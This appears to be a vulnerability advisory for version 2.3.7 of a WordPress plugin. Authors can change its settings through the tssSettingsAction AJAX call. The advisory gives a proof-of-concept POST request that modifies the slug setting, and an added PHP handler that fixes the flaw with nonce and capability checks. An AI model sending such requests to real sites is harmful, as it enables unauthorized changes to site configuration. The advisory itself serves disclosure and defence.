Description

The plugin does not properly ensure that a user has the necessary capabilities to edit certain sensitive plugin settings, making it possible for users with at least the Author role to edit them.
tss
2) Insert the found nonce and cookies into the request to change the plugin settings:

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: Author+
Content-Length: 144
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

slug=updatedButShouldntBe&tss_nonce=30fd47c1fe&action=tssSettingsAction
```

| CPE | Name | Operator | Version |
|---|---|---|---|
| | | eq | 2.3.7 |
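
The missing check from the description, shown as an added example (not the plugin's own code): a hardened handler for the `tssSettingsAction` AJAX action that verifies the `tss_nonce` field and then the caller's capability before writing settings. The function name, nonce action string, option name and the choice of `manage_options` as the required capability are assumptions made for illustration.

```php
<?php
// Added illustration, not the plugin's source. The AJAX action name and the
// nonce field name come from the request above; everything prefixed
// "example_" is hypothetical.

add_action( 'wp_ajax_tssSettingsAction', 'example_tss_save_settings' );

function example_tss_save_settings() {
    // 1. CSRF check. Reads $_REQUEST['tss_nonce']; the third argument (false)
    //    makes the call return false instead of dying, so we can answer in JSON.
    if ( ! check_ajax_referer( 'example_tss_settings', 'tss_nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce.' ), 403 );
    }

    // 2. Authorization check. A valid nonce only shows the request originated
    //    from a page served to this logged-in user; it says nothing about
    //    whether that user may change settings. Without this check, any role
    //    that can obtain the nonce (Author and above here) can write settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Accept only known keys and sanitize each value before storing it.
    $allowed  = array( 'slug' );
    $settings = get_option( 'example_tss_settings', array() );

    foreach ( $allowed as $key ) {
        if ( isset( $_POST[ $key ] ) ) {
            $settings[ $key ] = sanitize_title( wp_unslash( $_POST[ $key ] ) );
        }
    }

    update_option( 'example_tss_settings', $settings );
    wp_send_json_success( array( 'message' => 'Settings saved.' ) );
}
```

With a handler like this, the request above sent with an Author's cookies and nonce receives a 403 JSON error at step 2, and the stored settings are left unchanged.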